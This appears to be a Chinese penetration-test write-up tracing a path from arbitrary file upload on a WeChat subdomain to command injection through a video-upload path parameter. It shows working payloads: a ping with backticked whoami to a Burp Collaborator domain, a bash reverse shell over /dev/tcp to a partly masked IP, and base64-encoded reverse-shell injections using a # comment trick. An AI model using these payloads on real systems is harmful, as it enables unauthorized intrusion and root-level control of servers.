从文件上传到命令注入

主站打开是这样的只有扫码登陆

尝试扫码提示未注册

查看js，网站用了webpack打包

所有请求都在

这个js里面

尝试寻找敏感接口无果

百度site:domain.com

注意到wx1子域，打开这个链接跳转到在微信打开

那就到微信打开，查看功能点发现一处上传，先上传正常图片

改最下面的filename，后缀不变

改上面的filename参数，发现应该是任意文件上传

因为在js中发现php的ueditor（访问文件不存在）

顾认为是php的站，于是上传php，成功上传

访问此php文件直接被下载回来，没有解析（文件在主站下）

此时想到的是这个目录不解析php文件，上传包中有一个path参数，想着将文件上传跨目录到网站根目录

先尝试随便命名一个文件夹，可以创建，访问文件也存在

尝试../ ..跨目录失败

后面尝试各种姿势还是没能跨目录，也尝试修改上传URI

把Image改为File，显示404

改为upload还是在原来那个目录

于是回头看，微信里的功能

找到一处视频上传，把图片改为mp4后缀上传抓包，发包直接报错

此时注意到报错返回的结果，是在执行视频解析的系统命令，注意到下面截图中的两个点

因为path可控那我是不是可以直接拼接命令呢，于是尝试拼接

| ping `whoami`.z889xcgz67006o0itleim0vxcoie63.burpcollaborator.net | 

dnslog收到响应whoami执行结果为root，此时确定存在命令执行

直接反弹shell，服务器没收到

| bash -i >& /dev/tcp/123.*.*.182/8080 0>&1 |

感觉是有特殊字符的原因，于是采用base64编码

tes.txt || echo YmFzaCAtaSA+JiAvZGV2L3*******uNTYuMjQuMTgyLzgwODAgMD4mMQ== | base64 -d | /bin/bash

监听的端口依然没收到响应

于是采用#注释后面的命令

tes.txt || echo YmFzaCAtaSA+JiAvZGV2L3*******uNTYuMjQuMTgyLzgwODAgMD4mMQ== | base64 -d | /bin/bash #

成功反弹shell，发现原来是node.js的站，难怪之前不解析

wx站

主站

此目录记录当时所做之尝试

其实一开始就应该注意到

Express是node.js的一个开发框架就不会在文件上传不解析那里搞那么久了